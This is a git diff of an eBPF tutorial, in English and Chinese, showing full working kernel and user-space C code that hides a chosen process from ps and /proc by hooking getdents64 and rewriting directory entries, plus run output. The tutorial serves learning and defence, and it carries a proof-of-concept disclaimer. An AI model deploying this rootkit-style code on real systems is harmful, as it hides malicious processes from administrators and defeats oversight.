PID of the process we want to hide, and then we read the contents of the directory entry and modify the `d_reclen` field so that it overwrites the next directory entry, thus hiding our target process. -在这个过程中,我们用到了 `bpf_probe_read_user`、`bpf_probe_read_user_str`、`bpf_probe_write_user` 这几个函数来读取和写入用户空间的数据。这是因为在内核空间,我们不能直接访问用户空间的数据,必须使用这些特殊的函数。 +In this process, we use the functions `bpf_probe_read_user`, `bpf_probe_read_user_str`, and `bpf_probe_write_user` to read and write user-space data. This is because in kernel space, we can't access user space data directly and must use these special functions. -在我们完成隐藏操作后,我们会向一个名为 `rb` 的环形缓冲区发送一个事件,表示我们已经成功地隐藏了一个进程。我们用 `bpf_ringbuf_reserve` 函数来预留缓冲区空间,然后将事件的数据填充到这个空间,并最后用 `bpf_ringbuf_submit` 函数将事件提交到缓冲区。 +After we finish the hiding operation, we send an event to a ring buffer called `rb` indicating that we have successfully hidden a process. We reserve space in the buffer with the `bpf_ringbuf_reserve` function, then fill that space with the event's data, and finally commit the event to the buffer with the `bpf_ringbuf_submit` function. -最后,我们清理了之前保存在 map 中的数据,并返回。 +Finally, we clean up the data previously saved in the map and return. -这段代码是在 eBPF 环境下实现进程隐藏的一个很好的例子。通过这个例子,我们可以看到 eBPF 提供的丰富的功能,如系统调用跟踪、map 存储、用户空间数据访问、尾调用等。这些功能使得我们能够在内核空间实现复杂的逻辑,而不需要修改内核代码。 +This code is a good example of process hiding in an eBPF environment. Through this example, we can see the rich features provided by eBPF, such as system call tracing, map storage, user-space data access, tail calls, and so on. These features allow us to implement complex logic in kernel space without modifying the kernel code. -## 用户态 eBPF 程序实现 +## User-Style eBPF Programming -我们在用户态的 eBPF 程序中主要进行了以下几个操作: +We perform the following operations in the userland eBPF program: -1. 打开 eBPF 程序。 -2. 设置我们想要隐藏的进程的 PID。 -3. 验证并加载 eBPF 程序。 -4. 等待并处理由 eBPF 程序发送的事件。 +1. Open the eBPF program. +2. Set the PID of the process we want to hide. +3. Verify and load the eBPF program. +4. Wait for and process events sent by the eBPF program. -首先,我们打开了 eBPF 程序。这个过程是通过调用 `pidhide_bpf__open` 函数实现的。如果这个过程失败了,我们就直接返回。 +First, we open the eBPF application. This is done by calling the `pidhide_bpf__open` function. If this process fails, we simply return. ```c skel = pidhide_bpf__open(); @@ -314,7 +314,7 @@ int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) } ``` -接下来,我们设置了我们想要隐藏的进程的 PID。这个过程是通过将 PID 保存到 eBPF 程序的 `rodata` 区域实现的。默认情况下,我们隐藏的是当前进程。 +Next, we set the PIDs of the processes we want to hide, which is done by saving the PIDs to the `rodata` area of the eBPF program. By default, we hide the current process. ```c char pid_to_hide[10]; @@ -328,7 +328,7 @@ int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) skel->rodata->target_ppid = env.target_ppid; ``` -然后,我们验证并加载 eBPF 程序。这个过程是通过调用 `pidhide_bpf__load` 函数实现的。如果这个过程失败了,我们就进行清理操作。 +We then validate and load the eBPF program. This is done by calling the `pidhide_bpf__load` function. If this process fails, we perform a cleanup operation. ```c err = pidhide_bpf__load(skel); @@ -339,7 +339,7 @@ int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) } ``` -最后,我们等待并处理由 eBPF 程序发送的事件。这个过程是通过调用 `ring_buffer__poll` 函数实现的。在这个过程中,我们每隔一段时间就检查一次环形缓冲区中是否有新的事件。如果有,我们就调用 `handle_event` 函数来处理这个事件。 +Finally, we wait for and process events sent by the eBPF program. This process is achieved by calling the `ring_buffer__poll` function. During this process, we check the ring buffer every so often for new events. If there is, we call the `handle_event` function to handle the event. ```c printf("Successfully started!\n"); @@ -361,9 +361,9 @@ while (!exiting) } ``` -`handle_event` 函数中,我们根据事件的内容打印了相应的消息。这个函数的参数包括一个上下文,事件的数据,以及数据的大小。我们首先将事件的数据转换为 `event` 结构体,然后根据 `success` 字段判断这个事件是否表示成功隐藏了一个进程,最后打 +In the `handle_event` function, we print the appropriate message based on the content of the event. The arguments to this function include a context, the data of the event, and the size of the data. We first convert the event data into an `event` structure, then determine if the event successfully hides a process based on the `success` field, and finally print the corresponding message. -印相应的消息。 +and then print the corresponding message. ```c static int handle_event(void *ctx, void *data, size_t data_sz) @@ -377,36 +377,28 @@ static int handle_event(void *ctx, void *data, size_t data_sz) } ``` -这段代码展示了如何在用户态使用 eBPF 程序来实现进程隐藏的功能。我们首先打开 eBPF 程序,然后设置我们想要隐藏的进程的 PID,再验证并加载 eBPF 程序,最后等待并处理由 eBPF 程序发送的事件。这个过程中,我们使用了 eBPF 提供的一些高级功能,如环形缓冲区和事件处理,这些功能使得我们能够在用户态方便地与内核态的 eBPF 程序进行交互。 +This code shows how to use the eBPF programme to hide a process in the user state. We first open the eBPF application, then set the PID of the process we want to hide, then validate and load the eBPF application, and finally wait for and process the events sent by the eBPF application. This process makes use of some advanced features provided by eBPF, such as ring buffers and event handling, which allow us to easily interact with the kernel state eBPF program from the user state. -完整源代码: +Full source code: https: [//github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide) -> 本文所示技术仅为概念验证,仅供学习使用,严禁用于不符合法律法规要求的场景。 +> The techniques shown in this paper are for proof of concept only and are intended for learning purposes only, and are not to be used in scenarios that do not comply with legal or regulatory requirements. -## 编译运行,隐藏 PID - -首先,我们需要编译 eBPF 程序: +## Compile and Run ```bash make ``` -然后,假设我们想要隐藏进程 ID 为 1534 的进程,可以运行如下命令: - ```sh sudo ./pidhide --pid-to-hide 1534 ``` -这条命令将使所有尝试读取 `/proc/` 目录的操作都无法看到 PID 为 1534 的进程。例如,我们可以选择一个进程进行隐藏: - ```console $ ps -aux | grep 1534 yunwei 1534 0.0 0.0 244540 6848 ? Ssl 6月02 0:00 /usr/libexec/gvfs-mtp-volume-monitor yunwei 32065 0.0 0.0 17712 2580 pts/1 S+ 05:43 0:00 grep --color=auto 1534 ``` -此时通过 ps 命令可以看到进程 ID 为 1534 的进程。但是,如果我们运行 `sudo ./pidhide --pid-to-hide 1534`,再次运行 `ps -aux | grep 1534`,就会发现进程 ID 为 1534 的进程已经不见了。 - ```console $ sudo ./pidhide --pid-to-hide 1534 Hiding PID 1534 @@ -422,8 +414,6 @@ Hid PID from program 31640 (ps) Hid PID from program 31649 (ps) ``` -这个程序将匹配这个 pid 的进程隐藏,使得像 `ps` 这样的工具无法看到,我们可以通过 `ps aux | grep 1534` 来验证。 - ```console $ ps -aux | grep 1534 root 31523 0.1 0.0 22004 5616 pts/2 S+ 05:42 0:00 sudo ./pidhide -p 1534 @@ -432,8 +422,8 @@ root 31525 0.3 0.0 3808 2456 pts/3 S+ 05:42 0:00 ./pidhide -p yunwei 31583 0.0 0.0 17712 2612 pts/1 S+ 05:42 0:00 grep --color=auto 1534 ``` -## 总结 +## Summary -通过本篇 eBPF 入门实践教程,我们深入了解了如何使用 eBPF 来隐藏进程或文件信息。我们学习了如何编写和加载 eBPF 程序,如何通过 eBPF 拦截系统调用并修改它们的行为,以及如何将这些知识应用到实际的网络安全和防御工作中。此外,我们也了解了 eBPF 的强大性,尤其是它能在不需要修改内核源代码或重启内核的情况下,允许用户在内核中执行自定义代码的能力。 +You can also visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and the full tutorial. -您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +> The original link of this article: diff --git a/src/24-hide/README.zh.md b/src/24-hide/README.zh.md new file mode 100644 index 0000000..e841921 --- /dev/null +++ b/src/24-hide/README.zh.md @@ -0,0 +1,439 @@ +# eBPF 开发实践:使用 eBPF 隐藏进程或文件信息 + +eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。 + +在本篇教程中,我们将展示如何利用 eBPF 来隐藏进程或文件信息,这是网络安全和防御领域中一种常见的技术。 + +## 背景知识与实现机制 + +"进程隐藏" 能让特定的进程对操作系统的常规检测机制变得不可见。在黑客攻击或系统防御的场景中,这种技术都可能被应用。具体来说,Linux 系统中每个进程都在 /proc/ 目录下有一个以其进程 ID 命名的子文件夹,包含了该进程的各种信息。`ps` 命令就是通过查找这些文件夹来显示进程信息的。因此,如果我们能隐藏某个进程的 /proc/ 文件夹,就能让这个进程对 `ps` 命令等检测手段“隐身”。 + +要实现进程隐藏,关键在于操作 `/proc/` 目录。在 Linux 中,`getdents64` 系统调用可以读取目录下的文件信息。我们可以通过挂接这个系统调用,修改它返回的结果,从而达到隐藏文件的目的。实现这个功能需要使用到 eBPF 的 `bpf_probe_write_user` 功能,它可以修改用户空间的内存,因此能用来修改 `getdents64` 返回的结果。 + +下面,我们会详细介绍如何在内核态和用户态编写 eBPF 程序来实现进程隐藏。 + +### 内核态 eBPF 程序实现 + +接下来,我们将详细介绍如何在内核态编写 eBPF 程序来实现进程隐藏。首先是 eBPF 程序的起始部分: + +```c +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to fold the dents buffer addresses +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buffs SEC(".maps"); + +// Map used to enable searching through the +// data in a loop +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, int); +} map_bytes_read SEC(".maps"); + +// Map with address of actual +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_to_patch SEC(".maps"); + +// Map to hold program tail calls +struct { + __uint(type, BPF_MAP_TYPE_PROG_ARRAY); + __uint(max_entries, 5); + __type(key, __u32); + __type(value, __u32); +} map_prog_array SEC(".maps"); +``` + +我们首先需要理解这个 eBPF 程序的基本构成和使用到的几个重要组件。前几行引用了几个重要的头文件,如 "vmlinux.h"、"bpf_helpers.h"、"bpf_tracing.h" 和 "bpf_core_read.h"。这些文件提供了 eBPF 编程所需的基础设施和一些重要的函数或宏。 + +- "vmlinux.h" 是一个包含了完整的内核数据结构的头文件,是从 vmlinux 内核二进制中提取的。使用这个头文件,eBPF 程序可以访问内核的数据结构。 +- "bpf_helpers.h" 头文件中定义了一系列的宏,这些宏是 eBPF 程序使用的 BPF 助手(helper)函数的封装。这些 BPF 助手函数是 eBPF 程序和内核交互的主要方式。 +- "bpf_tracing.h" 是用于跟踪事件的头文件,它包含了许多宏和函数,这些都是为了简化 eBPF 程序对跟踪点(tracepoint)的操作。 +- "bpf_core_read.h" 头文件提供了一组用于从内核读取数据的宏和函数。 + +程序中定义了一系列的 map 结构,这些 map 是 eBPF 程序中的主要数据结构,它们用于在内核态和用户态之间共享数据,或者在 eBPF 程序中存储和传递数据。 + +其中,"rb" 是一个 Ringbuffer 类型的 map,它用于从内核向用户态传递消息。Ringbuffer 是一种能在内核和用户态之间高效传递大量数据的数据结构。 + +"map_buffs" 是一个 Hash 类型的 map,它用于存储目录项(dentry)的缓冲区地址。 + +"map_bytes_read" 是另一个 Hash 类型的 map,它用于在数据循环中启用搜索。 + +"map_to_patch" 是另一个 Hash 类型的 map,存储了需要被修改的目录项(dentry)的地址。 + +"map_prog_array" 是一个 Prog Array 类型的 map,它用于保存程序的尾部调用。 + +程序中的 "target_ppid" 和 "pid_to_hide_len"、"pid_to_hide" 是几个重要的全局变量,它们分别存储了目标父进程的 PID、需要隐藏的 PID 的长度以及需要隐藏的 PID。 + +接下来的代码部分,程序定义了一个名为 "linux_dirent64" 的结构体,这个结构体代表一个 Linux 目录项。然后程序定义了两个函数,"handle_getdents_enter" 和 "handle_getdents_exit",这两个函数分别在 getdents64 系统调用的入口和出口被调用,用于实现对目录项的操作。 + +```c + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// These store the string representation +// of the PID to hide. This becomes the name +// of the folder in /proc/ +const volatile int pid_to_hide_len = 0; +const volatile char pid_to_hide[MAX_PID_LEN]; + +// struct linux_dirent64 { +// u64 d_ino; /* 64-bit inode number */ +// u64 d_off; /* 64-bit offset to next structure */ +// unsigned short d_reclen; /* Size of this dirent */ +// unsigned char d_type; /* File type */ +// char d_name[]; /* Filename (null-terminated) */ }; +// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); +SEC("tp/syscalls/sys_enter_getdents64") +int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + int pid = pid_tgid >> 32; + unsigned int fd = ctx->args[0]; + unsigned int buff_count = ctx->args[2]; + + // Store params in map for exit function + struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1]; + bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY); + + return 0; +} +``` + +在这部分代码中,我们可以看到 eBPF 程序的一部分具体实现,该程序负责在 `getdents64` 系统调用的入口处进行处理。 + +我们首先声明了几个全局的变量。其中 `target_ppid` 代表我们要关注的目标父进程的 PID。如果这个值为 0,那么我们将关注所有的进程。`pid_to_hide_len` 和 `pid_to_hide` 则分别用来存储我们要隐藏的进程的 PID 的长度和 PID 本身。这个 PID 会转化成 `/proc/` 目录下的一个文件夹的名称,因此被隐藏的进程在 `/proc/` 目录下将无法被看到。 + +接下来,我们声明了一个名为 `linux_dirent64` 的结构体。这个结构体代表一个 Linux 目录项,包含了一些元数据,如 inode 号、下一个目录项的偏移、当前目录项的长度、文件类型以及文件名。 + +然后是 `getdents64` 函数的原型。这个函数是 Linux 系统调用,用于读取一个目录的内容。我们的目标就是在这个函数执行的过程中,对目录项进行修改,以实现进程隐藏。 + +随后的部分是 eBPF 程序的具体实现。我们在 `getdents64` 系统调用的入口处定义了一个名为 `handle_getdents_enter` 的函数。这个函数首先获取了当前进程的 PID 和线程组 ID,然后检查这个进程是否是我们关注的进程。如果我们设置了 `target_ppid`,那么我们就只关注那些父进程的 PID 为 `target_ppid` 的进程。如果 `target_ppid` 为 0,我们就关注所有进程。 + +在确认了当前进程是我们关注的进程之后,我们将 `getdents64` 系统调用的参数保存到一个 map 中,以便在系统调用返回时使用。我们特别关注 `getdents64` 系统调用的第二个参数,它是一个指向 `linux_dirent64` 结构体的指针,代表了系统调用要读取的目录的内容。我们将这个指针以及当前的 PID 和线程组 ID 作为键值对保存到 `map_buffs` 这个 map 中。 + +至此,我们完成了 `getdents64` 系统调用入口处的处理。在系统调用返回时,我们将会在 `handle_getdents_exit` 函数中,对目录项进行修改,以实现进程隐藏。 + +在接下来的代码段中,我们将要实现在 `getdents64` 系统调用返回时的处理。我们主要的目标就是找到我们想要隐藏的进程,并且对目录项进行修改以实现隐藏。 + +我们首先定义了一个名为 `handle_getdents_exit` 的函数,它将在 `getdents64` 系统调用返回时被调用。 + +```c + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int total_bytes_read = ctx->ret; + // if bytes_read is 0, everything's been read + if (total_bytes_read <= 0) { + return 0; + } + + // Check we stored the address of the buffer from the syscall entry + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // All of this is quite complex, but basically boils down to + // Calling 'handle_getdents_exit' in a loop to iterate over the file listing + // in chunks of 200, and seeing if a folder with the name of our pid is in there. + // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual + // patching + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp = 0; + int pid = pid_tgid >> 32; + short unsigned int d_reclen = 0; + char filename[MAX_PID_LEN]; + + unsigned int bpos = 0; + unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid); + if (pBPOS != 0) { + bpos = *pBPOS; + } + + for (int i = 0; i < 200; i ++) { + if (bpos >= total_bytes_read) { + break; + } + dirp = (struct linux_dirent64 *)(buff_addr+bpos); + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + + int j = 0; + for (j = 0; j < pid_to_hide_len; j++) { + if (filename[j] != pid_to_hide[j]) { + break; + } + } + if (j == pid_to_hide_len) { + // *********** + // We've found the folder!!! + // Jump to handle_getdents_patch so we can remove it! + // *********** + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY); + bpos += d_reclen; + } + + // If we didn't find it, but there's still more to read, + // jump back the start of this function and keep looking + if (bpos < total_bytes_read) { + bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY); + bpf_tail_call(ctx, &map_prog_array, PROG_01); + } + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + + return 0; +} + +``` + +在这个函数中,我们首先获取了当前进程的 PID 和线程组 ID,然后检查系统调用是否读取到了目录的内容。如果没有读取到内容,我们就直接返回。 + +然后我们从 `map_buffs` 这个 map 中获取 `getdents64` 系统调用入口处保存的目录内容的地址。如果我们没有保存过这个地址,那么就没有必要进行进一步的处理。 + +接下来的部分有点复杂,我们用了一个循环来迭代读取目录的内容,并且检查是否有我们想要隐藏的进程的 PID。如果我们找到了,我们就用 `bpf_tail_call` 函数跳转到 `handle_getdents_patch` 函数,进行实际的隐藏操作。 + +```c +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) +{ + // Only patch if we've already checked and found our pid's folder to hide + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // Unlink target, by reading in previous linux_dirent64 struct, + // and setting it's d_reclen to cover itself and our target. + // This will make the program skip over our folder. + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr; + short unsigned int d_reclen_previous = 0; + bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen); + + struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous); + short unsigned int d_reclen = 0; + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + + // Debug print + char filename[MAX_PID_LEN]; + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename previous %s\n", filename); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename next one %s\n", filename); + + // Attempt to overwrite + short unsigned int d_reclen_new = d_reclen_previous + d_reclen; + long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)); + + // Send an event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = (pid_tgid >> 32); + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + bpf_map_delete_elem(&map_to_patch, &pid_tgid); + return 0; +} + +``` + +在 `handle_getdents_patch` 函数中,我们首先检查我们是否已经找到了我们想要隐藏的进程的 PID。然后我们读取目录项的内容,并且修改 `d_reclen` 字段,让它覆盖下一个目录项,这样就可以隐藏我们的目标进程了。 + +在这个过程中,我们用到了 `bpf_probe_read_user`、`bpf_probe_read_user_str`、`bpf_probe_write_user` 这几个函数来读取和写入用户空间的数据。这是因为在内核空间,我们不能直接访问用户空间的数据,必须使用这些特殊的函数。 + +在我们完成隐藏操作后,我们会向一个名为 `rb` 的环形缓冲区发送一个事件,表示我们已经成功地隐藏了一个进程。我们用 `bpf_ringbuf_reserve` 函数来预留缓冲区空间,然后将事件的数据填充到这个空间,并最后用 `bpf_ringbuf_submit` 函数将事件提交到缓冲区。 + +最后,我们清理了之前保存在 map 中的数据,并返回。 + +这段代码是在 eBPF 环境下实现进程隐藏的一个很好的例子。通过这个例子,我们可以看到 eBPF 提供的丰富的功能,如系统调用跟踪、map 存储、用户空间数据访问、尾调用等。这些功能使得我们能够在内核空间实现复杂的逻辑,而不需要修改内核代码。 + +## 用户态 eBPF 程序实现 + +我们在用户态的 eBPF 程序中主要进行了以下几个操作: + +1. 打开 eBPF 程序。 +2. 设置我们想要隐藏的进程的 PID。 +3. 验证并加载 eBPF 程序。 +4. 等待并处理由 eBPF 程序发送的事件。 + +首先,我们打开了 eBPF 程序。这个过程是通过调用 `pidhide_bpf__open` 函数实现的。如果这个过程失败了,我们就直接返回。 + +```c + skel = pidhide_bpf__open(); + if (!skel) + { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } +``` + +接下来,我们设置了我们想要隐藏的进程的 PID。这个过程是通过将 PID 保存到 eBPF 程序的 `rodata` 区域实现的。默认情况下,我们隐藏的是当前进程。 + +```c + char pid_to_hide[10]; + if (env.pid_to_hide == 0) + { + env.pid_to_hide = getpid(); + } + sprintf(pid_to_hide, "%d", env.pid_to_hide); + strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide)); + skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1; + skel->rodata->target_ppid = env.target_ppid; +``` + +然后,我们验证并加载 eBPF 程序。这个过程是通过调用 `pidhide_bpf__load` 函数实现的。如果这个过程失败了,我们就进行清理操作。 + +```c + err = pidhide_bpf__load(skel); + if (err) + { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } +``` + +最后,我们等待并处理由 eBPF 程序发送的事件。这个过程是通过调用 `ring_buffer__poll` 函数实现的。在这个过程中,我们每隔一段时间就检查一次环形缓冲区中是否有新的事件。如果有,我们就调用 `handle_event` 函数来处理这个事件。 + +```c +printf("Successfully started!\n"); +printf("Hiding PID %d\n", env.pid_to_hide); +while (!exiting) +{ + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) + { + err = 0; + break; + } + if (err < 0) + { + printf("Error polling perf buffer: %d\n", err); + break; + } +} +``` + +`handle_event` 函数中,我们根据事件的内容打印了相应的消息。这个函数的参数包括一个上下文,事件的数据,以及数据的大小。我们首先将事件的数据转换为 `event` 结构体,然后根据 `success` 字段判断这个事件是否表示成功隐藏了一个进程,最后打 + +印相应的消息。 + +```c +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Hid PID from program %d (%s)\n", e->pid, e->comm); + else + printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm); + return 0; +} +``` + +这段代码展示了如何在用户态使用 eBPF 程序来实现进程隐藏的功能。我们首先打开 eBPF 程序,然后设置我们想要隐藏的进程的 PID,再验证并加载 eBPF 程序,最后等待并处理由 eBPF 程序发送的事件。这个过程中,我们使用了 eBPF 提供的一些高级功能,如环形缓冲区和事件处理,这些功能使得我们能够在用户态方便地与内核态的 eBPF 程序进行交互。 + +完整源代码: + +> 本文所示技术仅为概念验证,仅供学习使用,严禁用于不符合法律法规要求的场景。 + +## 编译运行,隐藏 PID + +首先,我们需要编译 eBPF 程序: + +```bash +make +``` + +然后,假设我们想要隐藏进程 ID 为 1534 的进程,可以运行如下命令: + +```sh +sudo ./pidhide --pid-to-hide 1534 +``` + +这条命令将使所有尝试读取 `/proc/` 目录的操作都无法看到 PID 为 1534 的进程。例如,我们可以选择一个进程进行隐藏: + +```console +$ ps -aux | grep 1534 +yunwei 1534 0.0 0.0 244540 6848 ? Ssl 6月02 0:00 /usr/libexec/gvfs-mtp-volume-monitor +yunwei 32065 0.0 0.0 17712 2580 pts/1 S+ 05:43 0:00 grep --color=auto 1534 +``` + +此时通过 ps 命令可以看到进程 ID 为 1534 的进程。但是,如果我们运行 `sudo ./pidhide --pid-to-hide 1534`,再次运行 `ps -aux | grep 1534`,就会发现进程 ID 为 1534 的进程已经不见了。 + +```console +$ sudo ./pidhide --pid-to-hide 1534 +Hiding PID 1534 +Hid PID from program 31529 (ps) +Hid PID from program 31551 (ps) +Hid PID from program 31560 (ps) +Hid PID from program 31582 (ps) +Hid PID from program 31582 (ps) +Hid PID from program 31585 (bash) +Hid PID from program 31585 (bash) +Hid PID from program 31609 (bash) +Hid PID from program 31640 (ps) +Hid PID from program 31649 (ps) +``` + +这个程序将匹配这个 pid 的进程隐藏,使得像 `ps` 这样的工具无法看到,我们可以通过 `ps aux | grep 1534` 来验证。 + +```console +$ ps -aux | grep 1534 +root 31523 0.1 0.0 22004 5616 pts/2 S+ 05:42 0:00 sudo ./pidhide -p 1534 +root 31524 0.0 0.0 22004 812 pts/3 Ss 05:42 0:00 sudo ./pidhide -p 1534 +root 31525 0.3 0.0 3808 2456 pts/3 S+ 05:42 0:00 ./pidhide -p 1534 +yunwei 31583 0.0 0.0 17712 2612 pts/1 S+ 05:42 0:00 grep --color=auto 1534 +``` + +## 总结 + +通过本篇 eBPF 入门实践教程,我们深入了解了如何使用 eBPF 来隐藏进程或文件信息。我们学习了如何编写和加载 eBPF 程序,如何通过 eBPF 拦截系统调用并修改它们的行为,以及如何将这些知识应用到实际的网络安全和防御工作中。此外,我们也了解了 eBPF 的强大性,尤其是它能在不需要修改内核源代码或重启内核的情况下,允许用户在内核中执行自定义代码的能力。 + +您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/24-hide/README_en.md b/src/24-hide/README_en.md deleted file mode 100644 index 437af5a..0000000 --- a/src/24-hide/README_en.md +++ /dev/null @@ -1,429 +0,0 @@ -# eBPF Practical Tutorial: Hiding Process or File Information - -eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows you to run, load, and update user-defined code without having to change the kernel source code or reboot the kernel. This capability allows eBPF to be used in a wide range of applications such as network and system performance analysis, packet filtering, and security policies. - -In this tutorial, we will show how eBPF can be used to hide process or file information, a common technique in the field of network security and defence. - -## Background Knowledge and Implementation Mechanism - -"Process hiding" enables a specific process to become invisible to the operating system's regular detection mechanisms. This technique can be used in both hacking and system defence scenarios. Specifically, each process on a Linux system has a subfolder named after its process ID in the /proc/ directory, which contains various information about the process. `ps` displays process information by looking in these folders. Therefore, if we can hide the /proc/ folder of a process, we can make that process invisible to `ps` commands and other detection methods. - -The key to achieving process hiding is to manipulate the `/proc/` directory. In Linux, the `getdents64` system call can read the information of files in the directory. We can hide files by hooking into this system call and modifying the results it returns. To do this, you need to use eBPF's `bpf_probe_write_user` function, which can modify user-space memory, and therefore can be used to modify the results returned by `getdents64`. - -In the following, we will describe in detail how to write eBPF programs in both kernel and user states to implement process hiding. - -### Kernel eBPF Program Implementation - -Next, we will describe in detail how to write eBPF program to implement process hiding in kernel state. The first part of the eBPF programme is the start: - -```c -// SPDX-License-Identifier: BSD-3-Clause -#include "vmlinux.h" -#include -#include -#include -#include "common.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -// Ringbuffer Map to pass messages from kernel to user -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} rb SEC(".maps"); - -// Map to fold the dents buffer addresses -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 8192); - __type(key, size_t); - __type(value, long unsigned int); -} map_buffs SEC(".maps"); - -// Map used to enable searching through the -// data in a loop -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 8192); - __type(key, size_t); - __type(value, int); -} map_bytes_read SEC(".maps"); - -// Map with address of actual -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 8192); - __type(key, size_t); - __type(value, long unsigned int); -} map_to_patch SEC(".maps"); - -// Map to hold program tail calls -struct { - __uint(type, BPF_MAP_TYPE_PROG_ARRAY); - __uint(max_entries, 5); - __type(key, __u32); - __type(value, __u32); -} map_prog_array SEC(".maps"); -``` - -The first thing we need to do is to understand the basic structure of the eBPF programme and the important components that are used. The first few lines reference several important header files, such as "vmlinux.h", "bpf_helpers.h", "bpf_tracing.h" and "bpf_core_read.h". These files provide the infrastructure needed for eBPF programming and some important functions or macros. - -- "vmlinux.h" is a header file containing the complete kernel data structures extracted from the vmlinux kernel binary. Using this header file, eBPF programs can access kernel data structures. -- The "bpf_helpers.h" header file defines a series of macros that encapsulate the BPF helper functions used by eBPF programs. These BPF helper functions are the main way that eBPF programs interact with the kernel. -- The "bpf_tracing.h" header file for tracing events contains a number of macros and functions designed to simplify the operation of tracepoints for eBPF programs. -- The "bpf_core_read.h" header file provides a set of macros and functions for reading data from the kernel. - -The program defines a series of map structures, which are the main data structures in an eBPF program, and are used to share data between the kernel and the user, or to store and transfer data within the eBPF program. - -Among them, "rb" is a map 